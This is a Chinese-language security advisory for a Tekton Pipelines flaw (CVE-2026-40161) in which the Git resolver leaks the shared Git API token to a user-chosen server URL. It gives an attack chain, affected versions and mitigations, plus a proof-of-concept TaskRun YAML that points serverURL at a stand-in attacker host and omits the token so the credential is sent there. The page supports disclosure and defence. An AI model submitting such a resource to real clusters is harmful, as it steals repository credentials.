CVE-2026-40161 CVSS 7.7 高危

CVE-2026-40161 Tekton Pipelines API令牌泄露漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40161

漏洞类型

信息泄露

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tekton Pipelines

漏洞概述

Tekton Pipelines在特定版本中存在安全漏洞，当Git解析器处于API模式且用户省略token参数时，会将系统配置的Git API令牌发送到用户控制的服务器URL。拥有TaskRun或PipelineRun创建权限的攻击者可利用此漏洞窃取共享令牌。

技术细节

该漏洞产生于Tekton Pipelines的Git解析器逻辑。在API模式下，若用户未显式提供Git访问令牌，解析器会自动使用集群配置的共享Git API令牌（如GitHub PAT）进行身份验证。由于未对目标服务器URL进行严格的安全校验，解析器会将携带该敏感令牌的请求发送至用户指定的任意serverURL。攻击者只需具备创建TaskRun或PipelineRun的低权限，即可构造恶意资源，将serverURL指向受控的外部服务器。当系统尝试解析Git仓库时，攻击者即可捕获并窃取用于访问代码仓库的高权限API令牌，进而可能危及代码库安全。

攻击链分析

STEP 1

权限获取

攻击者获取拥有创建TaskRun或PipelineRun权限的低权限账户。

STEP 2

构造Payload

攻击者创建恶意TaskRun或PipelineRun资源，在解析器参数中设置serverURL为受控服务器，并故意省略token参数。

STEP 3

触发漏洞

Tekton控制器接收资源请求，调用Git解析器，并携带系统默认的Git API令牌向攻击者控制的服务器URL发起请求。

STEP 4

凭证窃取

攻击者通过服务器日志捕获请求中的Authorization头，从而获取系统共享的Git API令牌。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

apiVersion: tekton.dev/v1
kind: TaskRun
metadata:
  name: malicious-taskrun
spec:
  taskRef:
    resolver: git
    params:
    - name: url
      value: https://github.com/tektoncd/pipeline.git
    - name: revision
      value: main
    # Malicious parameter: pointing to attacker's server
    - name: serverURL
      value: https://attacker-controlled-domain.com/leak
    # Omitting 'token' parameter triggers the leak of the system default token

影响范围

Tekton Pipelines >= 1.0.0, < 1.0.2

Tekton Pipelines >= 1.3.0, < 1.3.4

Tekton Pipelines >= 1.6.0, < 1.6.2

Tekton Pipelines >= 1.9.0, < 1.9.3

Tekton Pipelines >= 1.11.0, < 1.11.1

防御指南

临时缓解措施

在不升级的情况下，应立即审查并收紧RBAC权限，撤销不可信租户的Pipeline创建权限。同时，在集群网络出口处部署防火墙或安全组，拦截Tekton组件发往非白名单域名的出站连接，防止敏感令牌被传输至外部恶意服务器。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表